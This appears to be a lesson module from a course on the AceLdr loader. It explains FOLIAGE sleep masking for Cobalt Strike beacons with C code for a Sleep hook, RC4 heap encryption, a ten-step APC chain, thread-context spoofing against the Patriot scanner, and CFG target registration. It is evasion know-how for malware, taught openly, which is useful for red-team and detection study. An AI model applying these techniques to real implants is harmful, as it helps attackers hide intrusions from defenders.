Module 8: FOLIAGE Sleep Masking

Encrypting the beacon in memory while it sleeps — the crown jewel of AceLdr's evasion

Advanced

The Big Idea

Inspired by SecIdiot/FOLIAGE

AceLdr's sleep masking is inspired by the FOLIAGE project by SecIdiot. The core insight: Cobalt Strike beacons spend the vast majority of their lifecycle sleeping between check-ins. During sleep, the beacon's code and data sit in memory unencrypted — a sitting target for memory scanners. FOLIAGE solves this by encrypting the beacon's heap and changing its memory permissions before sleeping, then reversing everything upon wakeup.

The challenge is that you can't simply encrypt yourself and then sleep — the code performing the encryption would also be encrypted. FOLIAGE's elegant solution uses Asynchronous Procedure Calls (APCs) queued to the current thread. The APCs execute in sequence when the thread enters an alertable wait state, performing all the masking operations without the beacon's own code needing to be executing.

Sleep_Hook — The Entry Point

When the beacon calls Sleep(dwMilliseconds), AceLdr's IAT hook intercepts it. The hook in hooks/delay.c first checks for short sleeps:

C — hooks/delay.c
VOID WINAPI Sleep_Hook(DWORD dwMilliseconds) {
    // Short sleep bypass: for sleeps under 1000ms, just call the
    // real Sleep directly. FOLIAGE overhead isn't worth it for
    // quick operational pauses (e.g., jitter calculations).
    if (dwMilliseconds < 1000) {
        STUB.Api.Sleep(dwMilliseconds);
        return;
    }

    // For real sleep intervals (>= 1 second):
    // 1. Generate a fresh RC4 encryption key
    // 2. Encrypt the entire private heap
    // 3. Queue the APC chain for sleep masking
    // 4. Enter alertable wait (APCs fire, thread sleeps)
    // 5. On wakeup: APCs decrypt heap, restore permissions
    //    (all handled by the APC chain)

    USTRING Key = { 0 };
    generateEncryptionKey(&Key);

    // Encrypt the private heap before sleeping
    encryptHeap(&Key);

    // Build and queue the APC chain, then sleep
    foliageSleep(dwMilliseconds, &Key);

    // After waking up, decrypt the heap
    encryptHeap(&Key);  // RC4 is symmetric: encrypt again = decrypt
}

The 1000ms Threshold

Short sleeps (under 1 second) bypass the entire FOLIAGE mechanism. This is a performance optimization. The beacon frequently uses short sleeps for jitter, retry logic, and internal timing. Running the full APC chain for every sub-second sleep would add significant overhead and produce suspicious patterns of APC queuing. Only the "real" sleep intervals between C2 check-ins trigger FOLIAGE.

generateEncryptionKey

A fresh encryption key is generated for each sleep cycle. This prevents key reuse across multiple sleep intervals, which would weaken the encryption:

C — hooks/delay.c
VOID generateEncryptionKey(PUSTRING Key) {
    // Allocate a 16-byte key buffer
    Key->Length    = 16;
    Key->MaxLength = 16;
    Key->Buffer    = (PVOID)STUB.Api.HeapAlloc(
                        STUB.Heap, 0, Key->MaxLength);

    // Fill with random bytes using the system RNG
    STUB.Api.RtlGenRandom(Key->Buffer, Key->Length);
}

The key is a 16-byte random buffer used as the RC4 key for SystemFunction032. Using RtlGenRandom (the underlying function behind CryptGenRandom) ensures cryptographically strong randomness.

encryptHeap — Walking and Encrypting

This function walks every allocated block on AceLdr's private heap and encrypts (or decrypts) it using RC4:

C — hooks/delay.c
VOID encryptHeap(PUSTRING Key) {
    PROCESS_HEAP_ENTRY Entry = { 0 };

    // Lock the heap to prevent concurrent access during encryption
    STUB.Api.RtlLockHeap(STUB.Heap);

    // Walk every block on the private heap
    while (STUB.Api.RtlWalkHeap(STUB.Heap, &Entry) == 0) {
        // Only encrypt BUSY (allocated) blocks
        if (Entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) {
            USTRING Data;
            Data.Length    = (USHORT)Entry.cbData;
            Data.MaxLength = (USHORT)Entry.cbData;
            Data.Buffer    = Entry.lpData;

            // SystemFunction032 = RC4 encrypt/decrypt
            // Since RC4 is symmetric, calling this twice with the
            // same key encrypts then decrypts (restoring plaintext)
            STUB.Api.SystemFunction032(&Data, Key);
        }
    }

    STUB.Api.RtlUnlockHeap(STUB.Heap);
}

Why RC4 via SystemFunction032?

SystemFunction032 — The Undocumented RC4

SystemFunction032 is an undocumented function exported by advapi32.dll (internally in cryptsp.dll). It implements RC4 stream cipher encryption. AceLdr uses it because:

RC4 Symmetry Property

RC4 is a stream cipher that generates a keystream from the key and XORs it with the data. Since XOR is its own inverse (A XOR K XOR K = A), calling SystemFunction032 twice with the same key first encrypts, then decrypts. This is why encryptHeap is called both before and after sleeping — the same function handles both directions.

The 10-Step APC Chain

The heart of FOLIAGE is a chain of 10 APCs queued to the current thread. These APCs execute in FIFO (first-in, first-out) order when the thread enters an alertable wait state via NtWaitForSingleObject.

FOLIAGE APC Chain (APCs 0-9)

#APC FunctionActionPurpose
0 NtWaitForSingleObject Wait on timer (sleep duration) The actual sleep — thread is suspended for the requested interval
1 NtGetContextThread Capture thread context (via trampoline) Save RSP, RIP, etc. before masking — used for Patriot evasion
2 NtSetContextThread Set RIP to legitimate wait location Make thread appear to be sleeping inside ntdll, not in beacon code
3 NtProtectVirtualMemory Change beacon memory to RW Remove execute permission — beacon code becomes non-executable data
4 SystemFunction032 Encrypt beacon code with RC4 Beacon code is now encrypted AND non-executable
5 NtWaitForSingleObject Wait on timer (sleep duration) The actual sleep happens here with beacon fully masked
6 SystemFunction032 Decrypt beacon code with RC4 Restore beacon code to plaintext
7 NtProtectVirtualMemory Change beacon memory back to RX Restore execute permission so beacon can run again
8 NtSetContextThread Restore original thread context (via trampoline) RIP points back to beacon code — used for Patriot evasion
9 NtSetEvent Signal completion event Signals that the chain is complete so the outer wait can finish

Visualizing the Chain

APC Execution Flow

APC 0
Wait (setup)
APC 1
Get context
APC 2
Spoof context
APC 3
RX → RW
APC 4
Encrypt code
APC 5
SLEEP (masked)
APC 6
Decrypt code
APC 7
RW → RX
APC 8
Restore context
APC 9
Signal done

Why Use APCs Instead of Direct Calls?

The Self-Encryption Problem

Consider what happens if you try to encrypt yourself directly:

  1. You call SystemFunction032 to encrypt the beacon's memory region
  2. But the code calling SystemFunction032 is inside that memory region
  3. After encryption, the next instruction to execute is now encrypted garbage
  4. The program crashes

APCs solve this elegantly. All APC functions (NtProtectVirtualMemory, SystemFunction032, etc.) live in ntdll.dll or advapi32.dll — system DLLs that are NOT part of the beacon's memory. When the thread enters an alertable wait, the kernel's APC dispatcher (inside ntdll) dequeues and executes each APC in order. The beacon's own code never needs to execute during the masking process.

Patriot Evasion via JMP RBX Trampoline

The Patriot tool detects sleeping beacons by inspecting the thread's saved context (particularly RIP) to see if it points to suspicious memory. FOLIAGE counters this on APCs 1 and 8:

The Patriot Problem

When a thread sleeps, its context is saved. If a tool calls NtGetContextThread on a sleeping beacon thread, it sees that RIP points into unbacked memory — proof that the thread was executing beacon code. Even with the beacon encrypted, the saved context reveals its presence.

The Solution: Context Spoofing

APCs 1 and 8 in the chain handle this by using the JMP [RBX] trampoline (the same gadget from Module 7) as an intermediary for NtGetContextThread and NtSetContextThread:

Pseudocode — Patriot evasion
// APC 1: Capture context through trampoline
//   - NtGetContextThread is called through the JMP RBX gadget
//   - The captured context shows RIP at the gadget (in a legit DLL)
//   - This context is saved for later restoration

// APC 2: Set spoofed context
//   - NtSetContextThread sets RIP to point inside ntdll
//     (e.g., NtWaitForSingleObject + some offset)
//   - Now if Patriot inspects the thread during sleep,
//     RIP appears to be inside ntdll = legitimate

// APC 8: Restore original context through trampoline
//   - NtSetContextThread restores the saved context from APC 1
//   - RIP is set back to the beacon code, ready to resume

Thread Context During Sleep

Before Masking
RIP = beacon code
(suspicious)
APCs 1-2
Save & spoof
thread context
During Sleep
RIP = ntdll.dll
(legitimate)
APC 8
Restore real
context
After Wakeup
RIP = beacon code
(running again)

CFG (Control Flow Guard) Handling

Windows Control Flow Guard (CFG) validates indirect call targets against a bitmap of approved addresses. Since APC dispatch involves indirect calls, AceLdr needs to register its hook functions as valid CFG targets:

C — cfg handling
// Before queuing APCs, register the trampoline as a valid
// CFG call target. Without this, CFG-enforced processes would
// terminate the thread when APC dispatch tries to call through
// an unregistered address.

PVOID  CfgAddr  = C_PTR(TrampolineFunc);
SIZE_T CfgSize  = sizeof(PVOID);

// NtSetInformationVirtualMemory with VmCfgCallTargetInformation
// adds our trampoline to the CFG bitmap
STUB.Api.NtSetInformationVirtualMemory(
    NtCurrentProcess(),
    VmCfgCallTargetInformation,
    1,
    &CfgAddr,
    &CfgInfo,
    sizeof(CfgInfo)
);

Why CFG Matters

Many modern processes run with CFG enabled. If AceLdr queues an APC whose target address isn't in the CFG bitmap, the APC dispatch will trigger a CFG violation — crashing the process. By calling NtSetInformationVirtualMemory with VmCfgCallTargetInformation, AceLdr adds its trampoline function as a valid call target, allowing the APC chain to execute without triggering CFG enforcement.

The Complete Sleep Cycle

Full FOLIAGE Sleep Sequence

Beacon calls
Sleep(60000)
Sleep_Hook
intercepts
Generate
RC4 key
Encrypt
private heap
Queue 10
APCs
Enter alertable
wait
APCs: mask code
+ spoof context
SLEEP
(fully masked)
APCs: decrypt
+ restore
Decrypt
private heap
Beacon
resumes

During the masked sleep window, a memory scanner sees:

Knowledge Check

Module 8 Quiz

1. When does AceLdr encrypt the private heap relative to the APC chain?

The private heap is encrypted before the APC chain is queued, directly in Sleep_Hook via encryptHeap(&Key). The APC chain handles encrypting the beacon's code region (which is a separate concern). After wakeup, encryptHeap is called again with the same key to decrypt (RC4 symmetry).

2. Why can AceLdr use the same encryptHeap function for both encryption and decryption?

RC4 generates a keystream and XORs it with the data. Since XOR is self-inverse (A ^ K ^ K = A), applying RC4 twice with the same key first encrypts, then decrypts. This is why encryptHeap is called with the same key before sleep (encrypt) and after wakeup (decrypt).

3. What does the thread context look like to a scanner during the masked sleep?

APC 2 in the chain uses NtSetContextThread to set RIP to a location inside ntdll.dll (such as an offset within NtWaitForSingleObject). This makes the thread appear to be legitimately waiting inside a system call. Tools like Patriot that inspect sleeping thread contexts will see ntdll as the instruction pointer, not suspicious beacon memory.